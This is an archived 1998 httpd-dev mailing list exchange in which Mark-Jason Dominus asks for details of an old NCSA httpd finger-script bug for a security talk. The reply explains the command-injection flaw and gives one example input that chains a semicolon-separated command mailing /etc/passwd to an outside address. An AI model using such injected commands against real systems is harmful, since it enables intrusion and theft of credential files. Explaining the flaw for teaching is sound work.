httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Josh Rotenberg <j...@parasite.com>
Subject Re: Seeking information about old NCSA httpd `finger' bug
Date Mon, 22 Jun 1998 17:43:00 GMT
i dont have the script in front of me, and i dont know of a particular
'incident', but im guessing the script doesnt escape characters in the command
it creates, i.e. you type in a query to finger, and the script simply takes it
and executes in a shell 'finger whatever@wherever' without checking for, say,
a ';', which would allow you to execute a second command, so if i were to type
'haxor@domain.net; mail haxor@domain< /etc/passwd'

i would end up getting the /etc/passwd file of the machine.

i assume this os what you are looking for ... sorry if im explaining stuff you
already know and were looking for something else.

josh



Said Mark-Jason Dominus <mjd@plover.com> on Mon, Jun 22, 1998 at 09:51:27AM -0400:
> 
> Back around 1995 or so there was a problem with a sample application
> distributed with NCSA httpd.  The application was a shell script that
> was supposed to deliver the `finger' service on the web.  
> 
> 
> 
> The problem was pretty typical; I think if you put some sort of shell
> metacharacter into the query string, you could get the program to
> execute arbitrary commands.  But I don't remember it exactly.  
> 
> I am going to be giving a talk about security and the WWW, and I
> wanted to discuss this episode.  I've been over the CERT archives and
> I can't find any information about it, and I've even dug up the old
> source code and found the script, but I can't figure out how to
> exercise the bug.
> 
> Is there anyone who remembers this and can remind me of the details?

-- 
	josh rotenberg - josh@parasite.com -  www.parasite.com		
			     // whatever

Mime
View raw message